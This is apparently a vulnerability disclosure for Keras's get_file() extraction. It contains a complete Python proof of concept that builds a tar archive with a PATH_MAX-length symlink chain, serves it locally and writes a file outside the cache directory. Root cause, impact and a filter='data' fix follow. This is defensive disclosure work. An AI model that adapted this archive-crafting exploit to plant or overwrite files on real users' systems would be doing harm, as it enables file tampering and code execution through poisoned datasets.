#!/usr/bin/env python3
import os, io, sys, tarfile, pathlib, platform, threading, time
import http.server, socketserver
# Import Keras directly (not through TensorFlow)
try:
import keras
print("Using standalone Keras:", keras.__version__)
get_file = keras.utils.get_file
except ImportError:
try:
import tensorflow as tf
print("Using Keras via TensorFlow:", tf.keras.__version__)
get_file = tf.keras.utils.get_file
except ImportError:
print("Neither Keras nor TensorFlow found!")
sys.exit(1)
print("=" * 60)
print("Keras get_file() PATH_MAX Symlink Vulnerability PoC")
print("=" * 60)
print("Python:", sys.version.split()[0])
print("Platform:", platform.platform())
root = pathlib.Path.cwd()
print(f"Working directory: {root}")
# Create target directory for exploit demonstration
exploit_dir = root / "exploit"
exploit_dir.mkdir(exist_ok=True)
# Clean up any previous exploit files
try:
(exploit_dir / "keras_pwned.txt").unlink()
except FileNotFoundError:
pass
print(f"\n=== INITIAL STATE ===")
print(f"Exploit directory: {exploit_dir}")
print(f"Files in exploit/: {[f.name for f in exploit_dir.iterdir()]}")
# Create malicious tar with PATH_MAX symlink resolution bug
print(f"\n=== Building PATH_MAX Symlink Exploit ===")
# Parameters for PATH_MAX exploitation
comp = 'd' * (55 if sys.platform == 'darwin' else 247)
steps = "abcdefghijklmnop" # 16-step symlink chain
path = ""
with tarfile.open("keras_dataset.tgz", mode="w:gz") as tar:
print("Creating deep symlink chain...")
# Build the symlink chain that will exceed PATH_MAX during resolution
for i, step in enumerate(steps):
# Directory with long name
dir_info = tarfile.TarInfo(os.path.join(path, comp))
dir_info.type = tarfile.DIRTYPE
tar.addfile(dir_info)
# Symlink pointing to that directory
link_info = tarfile.TarInfo(os.path.join(path, step))
link_info.type = tarfile.SYMTYPE
link_info.linkname = comp
tar.addfile(link_info)
path = os.path.join(path, comp)
if i < 3 or i % 4 == 0: # Print progress for first few and every 4th
print(f" Step {i+1}: {step} -> {comp[:20]}...")
# Create the final symlink that exceeds PATH_MAX
# This is where the symlink resolution breaks down
long_name = "x" * 254
linkpath = os.path.join("/".join(steps), long_name)
max_link = tarfile.TarInfo(linkpath)
max_link.type = tarfile.SYMTYPE
max_link.linkname = ("../" * len(steps))
tar.addfile(max_link)
print(f"✓ Created PATH_MAX symlink: {len(linkpath)} characters")
print(f" Points to: {'../' * len(steps)}")
# Exploit file through the broken symlink resolution
exploit_path = linkpath + "/../../../exploit/keras_pwned.txt"
exploit_content = b"KERAS VULNERABILITY CONFIRMED!\nThis file was created outside the cache directory!\nKeras get_file() is vulnerable to PATH_MAX symlink attacks!\n"
exploit_file = tarfile.TarInfo(exploit_path)
exploit_file.type = tarfile.REGTYPE
exploit_file.size = len(exploit_content)
tar.addfile(exploit_file, fileobj=io.BytesIO(exploit_content))
print(f"✓ Added exploit file via broken symlink path")
# Add legitimate dataset content
dataset_content = b"# Keras Dataset Sample\nThis appears to be a legitimate ML dataset\nimage1.jpg,cat\nimage2.jpg,dog\nimage3.jpg,bird\n"
dataset_file = tarfile.TarInfo("dataset/labels.csv")
dataset_file.type = tarfile.REGTYPE
dataset_file.size = len(dataset_content)
tar.addfile(dataset_file, fileobj=io.BytesIO(dataset_content))
# Dataset directory
dataset_dir = tarfile.TarInfo("dataset/")
dataset_dir.type = tarfile.DIRTYPE
tar.addfile(dataset_dir)
print("✓ Malicious Keras dataset created")
# Comparison Test: Python tarfile with filter (SAFE)
print(f"\n=== COMPARISON: Python tarfile with data filter ===")
try:
with tarfile.open("keras_dataset.tgz", "r:gz") as tar:
tar.extractall("python_safe", filter="data")
files_after = [f.name for f in exploit_dir.iterdir()]
print(f"✓ Python safe extraction completed")
print(f"Files in exploit/: {files_after}")
# Cleanup
import shutil
if pathlib.Path("python_safe").exists():
shutil.rmtree("python_safe", ignore_errors=True)
except Exception as e:
print(f"❌ Python safe extraction blocked: {str(e)[:80]}...")
files_after = [f.name for f in exploit_dir.iterdir()]
print(f"Files in exploit/: {files_after}")
# Start HTTP server to serve malicious archive
class SilentServer(http.server.SimpleHTTPRequestHandler):
def log_message(self, *args): pass
def run_server():
with socketserver.TCPServer(("127.0.0.1", 8005), SilentServer) as httpd:
httpd.allow_reuse_address = True
httpd.serve_forever()
server = threading.Thread(target=run_server, daemon=True)
server.start()
time.sleep(0.3)
# Keras vulnerability test
cache_dir = root / "keras_cache"
cache_dir.mkdir(exist_ok=True)
url = "http://127.0.0.1:8005/keras_dataset.tgz"
print(f"\n=== KERAS VULNERABILITY TEST ===")
print(f"Testing: keras.utils.get_file() with extract=True")
print(f"URL: {url}")
print(f"Cache: {cache_dir}")
print(f"Expected extraction: keras_cache/datasets/keras_dataset/")
print(f"Exploit target: exploit/keras_pwned.txt")
try:
# The vulnerable Keras call
extracted_path = get_file(
"keras_dataset",
url,
cache_dir=str(cache_dir),
extract=True
)
print(f"✓ Keras extraction completed")
print(f"✓ Returned path: {extracted_path}")
except Exception as e:
print(f"❌ Keras extraction failed: {e}")
import traceback
traceback.print_exc()
# Vulnerability assessment
print(f"\n=== VULNERABILITY RESULTS ===")
final_exploit_files = [f.name for f in exploit_dir.iterdir()]
print(f"Files in exploit directory: {final_exploit_files}")
if "keras_pwned.txt" in final_exploit_files:
print(f"\n🚨 KERAS VULNERABILITY CONFIRMED! 🚨")
exploit_file = exploit_dir / "keras_pwned.txt"
content = exploit_file.read_text()
print(f"Exploit file created: {exploit_file}")
print(f"Content:\n{content}")
print(f"🔍 TECHNICAL DETAILS:")
print(f" • Keras uses tarfile.extractall() without filter parameter")
print(f" • PATH_MAX symlink resolution bug bypassed security checks")
print(f" • File created outside intended cache directory")
print(f" • Same vulnerability pattern as TensorFlow get_file()")
print(f"\n📊 COMPARISON RESULTS:")
print(f" ✅ Python with filter='data': BLOCKED exploit")
print(f" ⚠️ Keras get_file(): ALLOWED exploit")
else:
print(f"✅ No exploit files detected")
print(f"Possible reasons:")
print(f" • Keras version includes security patches")
print(f" • Platform-specific path handling prevented exploit")
print(f" • Archive extraction path differed from expected")
# Show what Keras actually extracted (safely)
print(f"\n=== KERAS EXTRACTION ANALYSIS ===")
try:
if 'extracted_path' in locals() and pathlib.Path(extracted_path).exists():
keras_path = pathlib.Path(extracted_path)
print(f"Keras extracted to: {keras_path}")
# Safely list contents
try:
contents = [item.name for item in keras_path.iterdir()]
print(f"Top-level contents: {contents}")
# Count symlinks (indicates our exploit structure was created)
symlink_count = 0
for item in keras_path.iterdir():
try:
if item.is_symlink():
symlink_count += 1
except PermissionError:
continue
print(f"Symlinks created: {symlink_count}")
if symlink_count > 0:
print(f"✓ PATH_MAX symlink chain was extracted")
except PermissionError:
print(f"Permission errors in extraction directory (expected with symlink corruption)")
except Exception as e:
print(f"Could not analyze Keras extraction: {e}")
print(f"\n=== REMEDIATION ===")
print(f"To fix this vulnerability, Keras should use:")
print(f"```python")
print(f"tarfile.extractall(path, filter='data') # Safe")
print(f"```")
print(f"Instead of:")
print(f"```python")
print(f"tarfile.extractall(path) # Vulnerable")
print(f"```")
# Cleanup
print(f"\n=== CLEANUP ===")
try:
os.unlink("keras_dataset.tgz")
print(f"✓ Removed malicious tar file")
except:
pass
print("PoC completed!")
Summary
Keras's
keras.utils.get_file()function is vulnerable to directory traversal attacks despite implementingfilter_safe_paths(). The vulnerability exists becauseextract_archive()uses Python'starfile.extractall()method without the security-criticalfilter="data"parameter. A PATH_MAX symlink resolution bug occurs before path filtering, allowing malicious tar archives to bypass security checks and write files outside the intended extraction directory.Details
Root Cause Analysis
Current Keras Implementation
The Critical Flaw
While Keras attempts to filter unsafe paths using
filter_safe_paths(), this filtering happens after the tar archive members are parsed and before actual extraction. However, the PATH_MAX symlink resolution bug occurs during extraction, not during member enumeration.Exploitation Flow:
filter_safe_paths()sees symlink paths that appear safeextractall()processes the filtered membersTechnical Details
The vulnerability exploits a known issue in Python's
tarfilemodule where excessively long symlink paths can cause resolution failures, leading to the symlink being treated as a literal path. This bypasses Keras's path filtering because:filter_safe_paths()operates on the parsed tar member informationextractall()../../../../etc/passwdto be writtenAffected Code Location
File:
keras/src/utils/file_utils.pyFunction:
extract_archive()around line 121Issue: Missing
filter="data"parameter intarfile.extractall()Proof of Concept
Environment Setup
Exploitation Steps
keras.utils.get_file()withextract=TrueKey Exploit Components
../../../target/file)Demonstration Results
Vulnerable behavior:
cache_dir/datasets/locationExpected secure behavior:
Impact
Vulnerability Classification
Who Is Impacted
Direct Impact:
keras.utils.get_file()withextract=TrueAttack Scenarios:
Affected Environments:
Risk Assessment
High Risk Factors:
Potential Consequences:
Recommended Fix
Immediate Mitigation
Replace the vulnerable extraction code with:
Long-term Solution
filter="data"parameter to alltarfile.extractall()callsBackward Compatibility
The fix maintains full backward compatibility as
filter="data"is the recommended secure default for Python 3.12+.References
Note: Reported in Huntr as well, but didn't get response
https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4